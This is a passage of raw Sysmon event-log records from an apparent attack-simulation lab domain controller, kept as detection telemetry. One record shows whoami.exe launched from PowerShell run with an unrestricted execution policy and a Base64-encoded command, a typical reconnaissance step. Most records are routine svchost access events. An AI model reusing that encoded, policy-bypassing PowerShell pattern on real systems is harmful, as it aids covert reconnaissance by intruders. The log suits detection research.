Corporation","OriginalFileName":"whoami.exe","CommandLine":"\"C:\\Windows\\system32\\whoami.exe\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-1090-5F25-0000-002096CA0400}","LogonId":"0x4ca96","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9","ParentProcessGuid":"{E2A3D6B1-1090-5F25-0000-00105FCE0400}","ParentProcessId":"4908","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkA","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2733,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2734,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2735,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2736,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2737,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2738,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2739,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2740,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 